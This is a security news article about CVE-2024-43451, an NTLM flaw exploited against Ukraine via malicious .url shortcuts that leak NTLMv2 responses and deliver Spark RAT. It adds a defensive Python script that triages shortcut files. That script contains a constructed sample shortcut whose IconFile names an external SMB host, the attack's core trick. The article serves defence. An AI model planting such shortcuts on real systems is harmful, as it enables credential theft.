A newly discovered security flaw in Windows NT LAN Manager (NTLM), labeled CVE-2024-43451 with a CVSS score of 6.5, has been exploited as a zero-day vulnerability by a suspected Russia-linked actor in cyberattacks against Ukraine.
The vulnerability, which Microsoft has now patched, lets an attacker obtain a user's NTLMv2 hash with only minimal interaction with a malicious file, such as selecting it with a single click, right-clicking to inspect it, or moving or deleting it. Because the user never has to open or execute the file, the bar for successful exploitation is far lower than for a conventional malicious attachment.
Israeli cybersecurity company ClearSky discovered the vulnerability being exploited in June 2024 as part of a multi-stage attack chain that delivers Spark RAT, an open-source remote access trojan, to affected systems. ClearSky noted that the flaw is triggered through Internet Shortcut (.url) files. In this case the malicious files were hosted on an official Ukrainian government website used for downloading academic certificates, indicating a targeted approach by the threat actor.
The attack method primarily involves phishing emails originating from a compromised Ukrainian government server. These emails prompt recipients to renew their academic certificates by clicking on a malicious URL within the message. When victims click, they inadvertently download a ZIP archive containing a dangerous URL shortcut file. This file triggers the vulnerability if the victim interacts with it in any way, such as right-clicking or attempting to move the file.
Once triggered, the URL file initiates a connection to a remote server, from which additional payloads, including Spark RAT, are downloaded. ClearSky's investigation noted that this behaviour raises alerts in sandbox environments, in particular for an attempt to send the NTLM hash over the SMB (Server Message Block) protocol. What actually leaves the machine is the NTLMv2 challenge-response that Windows computes when it tries to authenticate to the attacker's SMB server. ClearSky describes the follow-on abuse as a Pass-the-Hash attack; strictly, a captured NTLMv2 response cannot be replayed the way an NT hash can, but it can be cracked offline to recover the password or relayed in real time to another service that accepts NTLM, either of which lets the attacker authenticate as the victim without ever knowing the password and so escalates the attack's impact.
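The property that makes a shortcut dangerous in the chain above is that one of its fields names a remote SMB location, so that Explorer authenticates to a server the attacker controls as soon as it resolves the file. The following triage helper is an added example, not ClearSky's or Microsoft's code: it parses a .url file and flags every path-bearing field that points at a remote UNC or file:// host, and rates the host as internal or external with a simple heuristic. The sample shortcut contents, the host names and the internal DNS suffix are constructed for illustration; the report does not say which field the real exploit used, so all of them are checked.

```python
# Added example (not ClearSky's or Microsoft's code): triage an Internet Shortcut
# (.url) file and flag fields that point at a remote UNC/SMB location, the property
# that makes a shortcut leak an NTLMv2 response when Explorer resolves it.
# Assumptions, not facts from the report: the sample .url contents, the host names
# and the "internal" domain suffix are constructed; which field the real exploit
# used is not stated on the page, so every path-bearing field is checked.
import configparser
import ipaddress
import re
from typing import Dict, List, Optional, Tuple

# [InternetShortcut] fields that Explorer resolves as paths when it renders,
# inspects or moves the shortcut, so any of them can carry a remote reference.
PATH_FIELDS = {"url", "iconfile", "workingdirectory"}

# \\host\share\... (UNC) and file://host/share/... both name an SMB target.
UNC_RE = re.compile(r"^\\\\([^\\/]+)(?:[\\/]|$)")
FILE_URL_RE = re.compile(r"^file://([^/\\]+)[/\\]", re.IGNORECASE)
# Constructed internal DNS suffix used to separate corporate shares from strangers.
INTERNAL_SUFFIXES = (".corp.example",)


def parse_url_file(text: str) -> Dict[str, str]:
    """Return the [InternetShortcut] section as a dict, keeping key case."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.optionxform = str  # keep "IconFile" rather than lower-casing it
    cp.read_string(text)
    if not cp.has_section("InternetShortcut"):
        return {}
    return dict(cp.items("InternetShortcut"))


def remote_host(value: str) -> Optional[str]:
    """Host named by a UNC path or file:// URL; None for local paths and web URLs."""
    v = value.strip()
    m = UNC_RE.match(v) or FILE_URL_RE.match(v)
    if not m:
        return None
    host = m.group(1)
    # \\?\C:\... and \\.\device are local namespaces, not network hosts.
    if host in ("?", "."):
        return None
    return host


def host_is_external(host: str) -> bool:
    """Heuristic: public IP, or a dotted name outside the assumed internal suffixes."""
    try:
        ip = ipaddress.ip_address(host)
        return not (ip.is_private or ip.is_loopback or ip.is_link_local)
    except ValueError:
        pass  # not an IP literal; treat it as a DNS/NetBIOS name
    name = host.lower().rstrip(".")
    if "." not in name:  # single-label name resolves through internal DNS/NetBIOS
        return False
    return not name.endswith(INTERNAL_SUFFIXES)


def triage(text: str) -> List[Tuple[str, str, bool]]:
    """List (field, host, external) for every field that references a remote host."""
    findings: List[Tuple[str, str, bool]] = []
    for field, value in parse_url_file(text).items():
        if field.lower() not in PATH_FIELDS:
            continue
        host = remote_host(value)
        if host is not None:
            findings.append((field, host, host_is_external(host)))
    return findings


# Constructed samples (not from the campaign). Real .url files use CRLF line
# endings; configparser strips them, so "\n" is used here for readability.
BENIGN_URL = (
    "[InternetShortcut]\n"
    "URL=https://www.example.org/\n"
    "IconFile=C:\\Windows\\System32\\shell32.dll\n"
    "IconIndex=13\n"
)
LEAKY_URL = (
    "[InternetShortcut]\n"
    "URL=https://www.example.org/renew-certificate\n"
    "IconFile=\\\\files.example.net\\share\\certificate.ico\n"
    "IconIndex=0\n"
    "WorkingDirectory=\\\\fileserver.corp.example\\docs\n"
)

if __name__ == "__main__":
    for label, sample in (("benign", BENIGN_URL), ("leaky", LEAKY_URL)):
        for field, host, external in triage(sample):
            state = "EXTERNAL" if external else "internal"
            print(f"{label}: {field} -> {host} ({state})")
```

Run against the constructed samples, the benign shortcut yields no findings while the leaky one reports its IconFile pointing at an external host and its WorkingDirectory pointing at an internal share. The external/internal split is only a prioritisation aid: any .url file arriving by e-mail or from a download site that references a UNC host at all deserves a look, and the complementary network control is to block outbound TCP 445 from workstations to the Internet so the leaked NTLMv2 response never reaches the attacker.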
The Computer Emergency Response Team of Ukraine (CERT-UA) has attributed this activity to a Russian threat actor tracked as UAC-0194. Separately, CERT-UA has observed phishing attacks that use tax-related lures to distribute LiteManager, a legitimate remote desktop tool, in a financially motivated campaign attributed to a different actor tracked as UAC-0050.
CERT-UA warned that accountants using remote banking systems are particularly at risk, and that in some cases funds have been stolen within an hour of the initial compromise. Taken together, these campaigns illustrate the range of tactics in use against Ukrainian targets, from a zero-day NTLM leak to commodity remote access tooling, and the continuing cyber risk to the country's critical sectors.